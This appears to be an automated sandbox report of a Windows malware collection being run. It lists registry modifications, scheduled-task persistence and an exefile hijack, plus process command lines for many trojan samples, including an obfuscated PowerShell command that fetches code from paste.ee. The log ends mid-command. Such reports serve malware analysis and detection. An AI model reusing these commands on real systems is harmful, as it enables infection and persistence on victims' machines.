| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\NETSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netstat.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Control Panel\Accessibility\Blind Access\On = "1" | C:\PROGRA~3\QQOFCC\TSH.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \Registry\User\S-1-5-21-2410826464-2353372766-2364966905-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 | C:\Windows\SysWOW64\cscript.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-18_Classes\Local Settings | C:\Users\Admin\Desktop\TROJAN~2.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133764986931068927" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\3582-490\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings | C:\Users\Admin\Desktop\HEUR-T~1.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings | C:\Users\Admin\Desktop\HEUR-T~1.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings | C:\Users\Admin\Desktop\HEUR-Trojan-Ransom.Win32.Blocker.vho-11123fd370dfdb5d9d5cade853fa923679377c7791bda00d2f415078e2729e65.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings | C:\Users\Admin\Desktop\HEUR-Exploit.Win32.ShellCode.vho-138c60f8df9c59cf59cbdfbf5004ceda539b0de2cd70207b79833805594a9746.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings | C:\Users\Public\Video\frame.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\REG.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\Bazaar.2020.08.7z:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\PROGRA~3\QQOFCC\TSH.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskmgr.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Mxnpxnryiygd\sbozxh.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\HEUR-T~3.EXE | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\HEUR-T~3.EXE | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\HEUR-T~3.EXE | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\HEUR-B~1.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\M2d9\IconCache3frdbf.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\M2d9\IconCache3frdbf.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\M2d9\IconCache3frdbf.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer | C:\Windows\SysWOW64\cscript.exe | N/A |
Uses Task Scheduler COM API
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\HEUR-T~1.EXE | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\HEUR-T~1.EXE | N/A |
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://samples.vx-underground.org/Samples/Bazaar%20Collection/Downloadable%20Releases/Bazaar.2020.08.7z"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://samples.vx-underground.org/Samples/Bazaar%20Collection/Downloadable%20Releases/Bazaar.2020.08.7z
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1952 -parentBuildID 20240401114208 -prefsHandle 1892 -prefMapHandle 1856 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cd7ecd67-1eb6-42d4-ac7e-2a1027c4087f} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2384 -parentBuildID 20240401114208 -prefsHandle 2376 -prefMapHandle 2368 -prefsLen 24598 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0325a52d-f779-4779-beb9-0ac47768324a} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2924 -childID 1 -isForBrowser -prefsHandle 2944 -prefMapHandle 2656 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bb4fec81-e24b-4592-ac6f-2774b281a27a} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3616 -childID 2 -isForBrowser -prefsHandle 3608 -prefMapHandle 3604 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {28813e2a-d48b-47d4-8220-63400c982e34} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4200 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4268 -prefMapHandle 4260 -prefsLen 29088 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a67f143f-186b-4ca1-a343-275af2fe41ab} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5656 -childID 3 -isForBrowser -prefsHandle 5680 -prefMapHandle 5700 -prefsLen 27172 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9e035b85-6e59-42db-8872-8606e4a9767b} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5676 -childID 4 -isForBrowser -prefsHandle 5844 -prefMapHandle 5848 -prefsLen 27172 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a57ac182-3e12-44ad-af0c-07805679b12d} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6104 -childID 5 -isForBrowser -prefsHandle 6004 -prefMapHandle 6008 -prefsLen 27172 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e6f8d9c-b6cb-43d8-94ba-e23d1d642ad7} 3112 "\\.\pipe\gecko-crash-server-pipe.3112" tab
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Bazaar.2020.08.7z"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0x80,0x108,0x7ffb74b2cc40,0x7ffb74b2cc4c,0x7ffb74b2cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1800,i,10315231538986753444,6390271201243123033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1804 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2056,i,10315231538986753444,6390271201243123033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2108 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2176,i,10315231538986753444,6390271201243123033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2212 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3048,i,10315231538986753444,6390271201243123033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3180 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3112,i,10315231538986753444,6390271201243123033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3236 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4448,i,10315231538986753444,6390271201243123033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4456 /prefetch:1
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7zO4E8D6D39\waiting.jse"
C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe
"C:\Users\Admin\Desktop\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe"
C:\Users\Admin\AppData\Local\Temp\3582-490\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe
"C:\Users\Admin\AppData\Local\Temp\3582-490\Virus.Win32.Neshta.a-0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Public\Video\frame.exe"
C:\Users\Public\Video\frame.exe
C:\Users\Public\Video\frame.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Public\Video\lphsi.exe"
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Public\Video\movie.mp4"
C:\Users\Public\Video\lphsi.exe
C:\Users\Public\Video\lphsi.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Public\Video\hrss.exe"
C:\Users\Public\Video\hrss.exe
C:\Users\Public\Video\hrss.exe
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004EC 0x00000000000004CC
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HEUR-E~1.EXE"
C:\Users\Admin\Desktop\HEUR-E~1.EXE
C:\Users\Admin\Desktop\HEUR-E~1.EXE
C:\Windows\SysWOW64\ipconfig.exe
"C:\Windows\system32\ipconfig.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2820 -ip 2820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 716
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\UDS-TR~1.EXE"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4840,i,10315231538986753444,6390271201243123033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4848 /prefetch:8
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HEUR-T~1.EXE"
C:\Users\Admin\Desktop\HEUR-T~1.EXE
C:\Users\Admin\Desktop\HEUR-T~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\PROGRA~3\QQOFCC\TSH.exe"
C:\PROGRA~3\QQOFCC\TSH.exe
C:\PROGRA~3\QQOFCC\TSH.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\TROJAN~1.EXE"
C:\Users\Admin\Desktop\TROJAN~1.EXE
C:\Users\Admin\Desktop\TROJAN~1.EXE
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4976,i,10315231538986753444,6390271201243123033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5036 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4640,i,10315231538986753444,6390271201243123033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4644 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5040,i,10315231538986753444,6390271201243123033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5036 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5076,i,10315231538986753444,6390271201243123033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4700 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5072,i,10315231538986753444,6390271201243123033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4216 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3372,i,10315231538986753444,6390271201243123033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4608 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5164,i,10315231538986753444,6390271201243123033,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4252 /prefetch:2
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\TROJAN~2.EXE"
C:\Users\Admin\Desktop\TROJAN~2.EXE
C:\Users\Admin\Desktop\TROJAN~2.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\TROJAN~3.EXE"
C:\Users\Admin\Desktop\TROJAN~2.EXE
C:\Users\Admin\Desktop\TROJAN~2.EXE /C
C:\Users\Admin\AppData\Roaming\Microsoft\Mxnpxnryiygd\sbozxh.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Mxnpxnryiygd\sbozxh.exe
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn ufjbzpzn /tr "\"C:\Users\Admin\Desktop\TROJAN~2.EXE\" /I ufjbzpzn" /SC ONCE /Z /ST 14:07 /ET 14:19
C:\Users\Admin\AppData\Roaming\Microsoft\Mxnpxnryiygd\sbozxh.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Mxnpxnryiygd\sbozxh.exe /C
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HEUR-T~3.EXE"
C:\Users\Admin\Desktop\HEUR-T~3.EXE
C:\Users\Admin\Desktop\HEUR-T~3.EXE
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HEUR-T~4.EXE"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\TROJAN~4.EXE"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\TROJAN~4.EXE"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\TROJAN~4.EXE"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HEUR-T~4.EXE"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\TR3020~1.EXE"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\TR3020~1.EXE"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HEUR-H~1.EXE"
C:\Users\Admin\Desktop\HEUR-T~3.EXE
"C:\Users\Admin\Desktop\HEUR-T~3.EXE"
C:\Users\Admin\Desktop\HEUR-T~3.EXE
"C:\Users\Admin\Desktop\HEUR-T~3.EXE"
C:\Windows\SysWOW64\cscript.exe
"C:\Windows\SysWOW64\cscript.exe"
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\Desktop\HEUR-T~3.EXE"
C:\Users\Admin\Desktop\TROJAN~2.EXE
C:\Users\Admin\Desktop\TROJAN~2.EXE /I ufjbzpzn
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Windows\TEMP\3582-490\TROJAN~2.EXE" /I ufjbzpzn
C:\Windows\TEMP\3582-490\TROJAN~2.EXE
C:\Windows\TEMP\3582-490\TROJAN~2.EXE /I ufjbzpzn
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\BACKDO~1.EXE"
C:\Users\Admin\Desktop\BACKDO~1.EXE
C:\Users\Admin\Desktop\BACKDO~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HEUR-T~3.EXE"
C:\Users\Admin\Desktop\HEUR-T~3.EXE
C:\Users\Admin\Desktop\HEUR-T~3.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HEUR-E~2.EXE"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\HEUR-B~1.EXE"
C:\Users\Admin\Desktop\HEUR-B~1.EXE
C:\Users\Admin\Desktop\HEUR-B~1.EXE
C:\Users\Admin\Desktop\HEUR-B~1.EXE
C:\Users\Admin\Desktop\HEUR-B~1.EXE
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\Desktop\TRF665~1.EXE"
C:\Users\Admin\Desktop\TRF665~1.EXE
C:\Users\Admin\Desktop\TRF665~1.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /`e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AVwBhAHkAdQBXACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAF4AIgAsACAAIgA0ADQAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAKgAiACwAIAAiADQAOAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAjACIALAAgACIANwA4ACIAK